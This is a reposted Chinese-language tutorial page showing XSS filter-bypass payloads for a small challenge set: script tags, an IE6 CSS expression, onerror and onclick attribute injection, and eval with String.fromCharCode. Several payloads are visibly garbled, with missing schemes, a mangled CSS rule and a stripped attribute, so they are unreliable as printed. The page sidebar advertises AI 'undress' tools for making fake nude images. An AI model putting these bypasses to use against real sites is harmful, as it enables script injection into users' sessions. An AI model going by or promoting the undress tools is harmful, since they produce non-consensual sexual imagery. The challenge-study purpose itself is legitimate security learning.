無安全性方面的限制,直接使用
<script>alert(/xss/);</script>
#限制條件:只能使用CSS,不允許使用html標籤
我們知道利用expression可以用來建構XSS,但只能在IE下面測試,所以下面的測試請在IE6中執行。
body { black; xss:alert(/xss/));/*IE6下测试*/ }
限制條件:對HTML進行了轉義,Image標籤可用。
測試輸入的字元會被插入到src位址中,那麼可以使用偽協定來繞過。
直接輸入
alert( /xss/);
或你也可以使用事件來繞過,注意閉合語句即可,如下:
1" onerror=alert(/xss/); var a="1
限制:使用了關鍵字過濾。
我測試了一下,大部分都過濾了,有部分未過濾,經過測試script/onerror過濾了,但是onclick未過濾,使用onclick事件繞過
<img alt="xss的小測試是怎麼進行的" >
限制條件:使用addslashes對特徵字元進行了轉義
也就是說我們的XSS語句中不能出現單引號,雙引號等等特徵字元。
直接使用
<script>alert(/xss/);</script>
即可繞過
或使用String.fromCharCode方法,如下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
以上是xss的小測試是怎麼進行的的詳細內容。更多資訊請關注PHP中文網其他相關文章!
陳述
本文轉載於:亿速云。如有侵權,請聯絡admin@php.cn刪除

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章
R.E.P.O.能量晶體解釋及其做什麼(黃色晶體)
3 週前By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳圖形設置
3 週前By尊渡假赌尊渡假赌尊渡假赌
刺客信條陰影:貝殼謎語解決方案
2 週前ByDDD
R.E.P.O.如果您聽不到任何人,如何修復音頻
3 週前By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:如何解鎖Myrise中的所有內容
3 週前By尊渡假赌尊渡假赌尊渡假赌

熱工具

Dreamweaver Mac版
視覺化網頁開發工具

MantisBT
Mantis是一個易於部署的基於Web的缺陷追蹤工具,用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。

SAP NetWeaver Server Adapter for Eclipse
將Eclipse與SAP NetWeaver應用伺服器整合。

VSCode Windows 64位元 下載
微軟推出的免費、功能強大的一款IDE編輯器

PhpStorm Mac 版本
最新(2018.2.1 )專業的PHP整合開發工具